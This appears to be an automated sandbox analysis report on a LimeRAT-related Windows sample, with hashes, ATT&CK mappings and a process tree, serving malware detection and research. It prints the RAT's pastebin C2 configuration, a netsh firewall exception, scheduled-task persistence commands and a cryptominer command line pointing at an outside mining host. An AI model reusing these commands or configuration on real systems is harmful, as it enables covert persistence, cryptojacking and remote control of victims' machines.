Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
26-04-2024 20:03
Static task
static1
Behavioral task
behavioral1
Sample
018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
Resource
win7-20240419-en
General
-
Target
018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
-
Size
24.3MB
-
MD5
018e93f66899228a3e980f8fa671c021
-
SHA1
76c9e359cf572757ba0bf5e372de1780f5fbae05
-
SHA256
46141664081fd940edcf0db0adcd081736a3bd5e2f9639037fc598e558104b31
-
SHA512
1804d279136feda7c468c63486d15e1b57f1c028d7e926cb733bf8f7c2c7d4b5b3506457b282393182cdcc7a71966b2ba9148d7b8f473a7367bace2b680b0056
-
SSDEEP
393216:d0pgWC+4cw08gMka47tPxDKdUU7K9HuNW7BqTOjDtXLEc3uoTHn:ZXjcCtkJPxkn8uw7Bq8X82n
Malware Config
Extracted
limerat
1JBKLGyE6AnRGvk92A8x3m8qmXfh3fcEty
-
aes_key
nulled
-
antivm
true
-
c2_url
https://pastebin.com/raw/cXuQ0V20
-
delay
3
-
download_payload
false
-
install
false
-
install_name
Winservices.exe
-
main_folder
AppData
-
pin_spread
false
-
sub_folder
\
-
usb_spread
true
Signatures
-
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2720 netsh.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation Torrent.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation Ccleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation djoin.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation data.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation μTorrent.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation sdchange.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation sdchange.exe Key value queried \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\Control Panel\International\Geo\Nation djoin.exe -
Executes dropped EXE 13 IoCs
pid Process 2816 Ccleaner.exe 4572 cleaner.exe 2776 Torrent.exe 5064 μTorrent.exe 3316 Project1.exe 5092 NetFramework.exe 2780 NetFramework.exe 3968 data.exe 2352 sdchange.exe 4776 djoin.exe 2728 sdchange.exe 2140 djoin.exe 4684 data.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe" Torrent.exe Set value (str) \REGISTRY\USER\S-1-5-21-877519540-908060166-1852957295-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe" μTorrent.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 10 pastebin.com 21 pastebin.com 24 pastebin.com 28 pastebin.com 31 pastebin.com 35 pastebin.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum RegAsm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 RegAsm.exe -
AutoIT Executable 5 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0005000000022973-4.dat autoit_exe behavioral2/files/0x000b000000023bad-15.dat autoit_exe behavioral2/files/0x000e000000023bf1-230.dat autoit_exe behavioral2/files/0x000a000000023bb5-231.dat autoit_exe behavioral2/files/0x0031000000023bb8-234.dat autoit_exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 4572 set thread context of 4564 4572 cleaner.exe 92 PID 2944 set thread context of 768 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 93 PID 5092 set thread context of 4376 5092 NetFramework.exe 107 PID 2780 set thread context of 4496 2780 NetFramework.exe 109 PID 2816 set thread context of 1504 2816 Ccleaner.exe 120 PID 2352 set thread context of 4592 2352 sdchange.exe 128 PID 4776 set thread context of 4904 4776 djoin.exe 133 PID 3968 set thread context of 3772 3968 data.exe 136 PID 2728 set thread context of 2284 2728 sdchange.exe 142 PID 2140 set thread context of 3936 2140 djoin.exe 145 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2360 3316 WerFault.exe 91 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 Taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName Taskmgr.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1352 schtasks.exe 4972 schtasks.exe 2932 schtasks.exe 2980 schtasks.exe 4212 schtasks.exe 3224 schtasks.exe 1460 schtasks.exe 888 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 3316 Project1.exe 3316 Project1.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe 3316 Project1.exe 3316 Project1.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 2776 Torrent.exe 2776 Torrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 5064 μTorrent.exe 2776 Torrent.exe 2776 Torrent.exe 2776 Torrent.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 768 RegSvcs.exe 4452 Taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 2776 Torrent.exe Token: SeDebugPrivilege 5064 μTorrent.exe Token: SeDebugPrivilege 768 RegSvcs.exe Token: SeDebugPrivilege 4452 Taskmgr.exe Token: SeSystemProfilePrivilege 4452 Taskmgr.exe Token: SeCreateGlobalPrivilege 4452 Taskmgr.exe Token: 33 768 RegSvcs.exe Token: SeIncBasePriorityPrivilege 768 RegSvcs.exe Token: SeDebugPrivilege 4564 RegAsm.exe Token: SeDebugPrivilege 4564 RegAsm.exe Token: SeDebugPrivilege 5092 NetFramework.exe Token: SeLockMemoryPrivilege 4376 explorer.exe Token: SeLockMemoryPrivilege 4376 explorer.exe Token: SeDebugPrivilege 2780 NetFramework.exe Token: SeLockMemoryPrivilege 4496 explorer.exe Token: SeLockMemoryPrivilege 4496 explorer.exe Token: SeDebugPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe Token: 33 1504 RegAsm.exe Token: SeIncBasePriorityPrivilege 1504 RegAsm.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe 4452 Taskmgr.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3316 Project1.exe 3316 Project1.exe 3316 Project1.exe 768 RegSvcs.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2944 wrote to memory of 2816 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 86 PID 2944 wrote to memory of 2816 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 86 PID 2944 wrote to memory of 2816 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 86 PID 2944 wrote to memory of 4572 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 88 PID 2944 wrote to memory of 4572 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 88 PID 2944 wrote to memory of 4572 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 88 PID 2944 wrote to memory of 2776 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 89 PID 2944 wrote to memory of 2776 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 89 PID 2944 wrote to memory of 5064 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 90 PID 2944 wrote to memory of 5064 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 90 PID 2944 wrote to memory of 3316 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 91 PID 2944 wrote to memory of 3316 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 91 PID 2944 wrote to memory of 3316 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 91 PID 4572 wrote to memory of 4564 4572 cleaner.exe 92 PID 4572 wrote to memory of 4564 4572 cleaner.exe 92 PID 4572 wrote to memory of 4564 4572 cleaner.exe 92 PID 4572 wrote to memory of 4564 4572 cleaner.exe 92 PID 4572 wrote to memory of 4564 4572 cleaner.exe 92 PID 2944 wrote to memory of 768 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 93 PID 2944 wrote to memory of 768 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 93 PID 2944 wrote to memory of 768 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 93 PID 2944 wrote to memory of 768 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 93 PID 2944 wrote to memory of 768 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 93 PID 4572 wrote to memory of 888 4572 cleaner.exe 94 PID 4572 wrote to memory of 888 4572 cleaner.exe 94 PID 4572 wrote to memory of 888 4572 cleaner.exe 94 PID 2944 wrote to memory of 1352 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 97 PID 2944 wrote to memory of 1352 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 97 PID 2944 wrote to memory of 1352 2944 018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe 97 PID 768 wrote to memory of 4452 768 RegSvcs.exe 102 PID 768 wrote to memory of 4452 768 RegSvcs.exe 102 PID 768 wrote to memory of 4452 768 RegSvcs.exe 102 PID 2776 wrote to memory of 5092 2776 Torrent.exe 105 PID 2776 wrote to memory of 5092 2776 Torrent.exe 105 PID 5064 wrote to memory of 2780 5064 μTorrent.exe 106 PID 5064 wrote to memory of 2780 5064 μTorrent.exe 106 PID 5092 wrote to memory of 4376 5092 NetFramework.exe 107 PID 5092 wrote to memory of 4376 5092 NetFramework.exe 107 PID 5092 wrote to memory of 4376 5092 NetFramework.exe 107 PID 5092 wrote to memory of 4376 5092 NetFramework.exe 107 PID 5092 wrote to memory of 4376 5092 NetFramework.exe 107 PID 5092 wrote to memory of 4376 5092 NetFramework.exe 107 PID 5092 wrote to memory of 4376 5092 NetFramework.exe 107 PID 2780 wrote to memory of 4496 2780 NetFramework.exe 109 PID 2780 wrote to memory of 4496 2780 NetFramework.exe 109 PID 2780 wrote to memory of 4496 2780 NetFramework.exe 109 PID 2780 wrote to memory of 4496 2780 NetFramework.exe 109 PID 2780 wrote to memory of 4496 2780 NetFramework.exe 109 PID 2780 wrote to memory of 4496 2780 NetFramework.exe 109 PID 2780 wrote to memory of 4496 2780 NetFramework.exe 109 PID 2816 wrote to memory of 1504 2816 Ccleaner.exe 120 PID 2816 wrote to memory of 1504 2816 Ccleaner.exe 120 PID 2816 wrote to memory of 1504 2816 Ccleaner.exe 120 PID 2816 wrote to memory of 1504 2816 Ccleaner.exe 120 PID 2816 wrote to memory of 1504 2816 Ccleaner.exe 120 PID 2816 wrote to memory of 4972 2816 Ccleaner.exe 121 PID 2816 wrote to memory of 4972 2816 Ccleaner.exe 121 PID 2816 wrote to memory of 4972 2816 Ccleaner.exe 121 PID 1504 wrote to memory of 2720 1504 RegAsm.exe 123 PID 1504 wrote to memory of 2720 1504 RegAsm.exe 123 PID 1504 wrote to memory of 2720 1504 RegAsm.exe 123 PID 2352 wrote to memory of 4592 2352 sdchange.exe 128 PID 2352 wrote to memory of 4592 2352 sdchange.exe 128 PID 2352 wrote to memory of 4592 2352 sdchange.exe 128
Processes
-
C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe"C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE4⤵
- Modifies Windows Firewall
PID:2720
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:4972
-
-
-
C:\Users\Admin\AppData\Local\Temp\cleaner.exe"C:\Users\Admin\AppData\Local\Temp\cleaner.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"3⤵
- Maps connected drives based on registry
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F3⤵
- Creates scheduled task(s)
PID:888
-
-
-
C:\Users\Admin\AppData\Local\Temp\Torrent.exe"C:\Users\Admin\AppData\Local\Temp\Torrent.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\explorer.exeC:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=504⤵
- Suspicious use of AdjustPrivilegeToken
PID:4376
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\μTorrent.exe"C:\Users\Admin\AppData\Local\Temp\μTorrent.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\explorer.exeC:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=504⤵
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Project1.exe"C:\Users\Admin\AppData\Local\Temp\Project1.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3316 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3316 -s 10883⤵
- Program crash
PID:2360
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\Taskmgr.exe"C:\Windows\System32\Taskmgr.exe"3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4452
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:1352
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3316 -ip 33161⤵PID:3368
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2800
-
C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exeC:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3968 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:3772
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:4212
-
-
C:\Users\Admin\secinit\sdchange.exeC:\Users\Admin\secinit\sdchange.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:4592
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:2932
-
-
C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exeC:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵PID:4904
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:2980
-
-
C:\Users\Admin\secinit\sdchange.exeC:\Users\Admin\secinit\sdchange.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2728 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"2⤵PID:2284
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:3224
-
-
C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exeC:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2140 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵PID:3936
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F2⤵
- Creates scheduled task(s)
PID:1460
-
-
C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exeC:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe1⤵
- Executes dropped EXE
PID:4684
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
316B
MD59f893d94b017a0684012d50319c9ffbe
SHA1140cc2cb6b2520ba4f9a1f666a5f679853472793
SHA2568a7cb420c82edf1bb2c7bdfef52091e5169fabaecc370e120985e91406fcbbec
SHA5124b7df94d3622b82d852b0f532d7fd810ca2113d7b737ec417023d5b2142e9e79414a06d22647d73f8bc114f8e871a3a741a479b0aba48892f9078975ec78acba
-
Filesize
1KB
MD545bc08b96d0a42db5f33963f68aeff54
SHA12cd2c242cc5c0303c3752519da1c783d8c669c7a
SHA2565bc8d756a311152bb5e4b40aa4e2e3a61afbd4f685382b26835b03a0b793fcb7
SHA5124c1e96568a8995ce50814685a24eb20f573c5501ce20cb02982bba0674ff41f98601215339c46378de0198a4c582c8e28316e8d6d0ffeacff7cfb5d35109d1a9
-
Filesize
507B
MD56832f1ed5b3043154d3b685cce8c8b87
SHA14c42ec0798aaad1fe7d7650e9e7c00bf978658b3
SHA256fa9d245a676b1e7c3ebd887c5e0d1655ddcb7faf632197796dbb61eaf5131061
SHA512cb847efcab6c67bbe0677984a6421befb559a32a33ea814d7acef539365f03cd14715e21e5d02b8d770abd73e74f8df108225aa1eb7dc8caca1723de15135584
-
Filesize
1.1MB
MD5d18ce77a75017e627de41febd9e289ee
SHA1012a66d318e8294492accc0beca42c9999b68146
SHA2567d6e025a8d510b10988375f020c60efec7d6ee77367ed8879e8a3b1172a5efd4
SHA512c5f24a7f7c9e8ed552aa6402539171551851afd86b85b28e4018c2c8cd38c4ed22cb726eec5f750d90a25343e61e1cc97c62b1a486cbac6e04b777886411c86f
-
Filesize
6.7MB
MD51166591fc5f77c463d176bcca574efff
SHA135d710b8983945aaf8c39d289fd6c73ed1f00b65
SHA256a51c6e6c19be022dcbf235a9bebeab1b73292e2ee40b48653e80b96f10aa9bad
SHA512751f5cf2cc5316ddbbba2805ac9c3fee24d80a85c92587c85ac80a2033aaeef96f58bcb5053584bcea7ad8fcb538183da9d29360f44666e1bfd3bdf0f08caa97
-
Filesize
1.1MB
MD5bcf5880698e760a8e7eff7534b5f763f
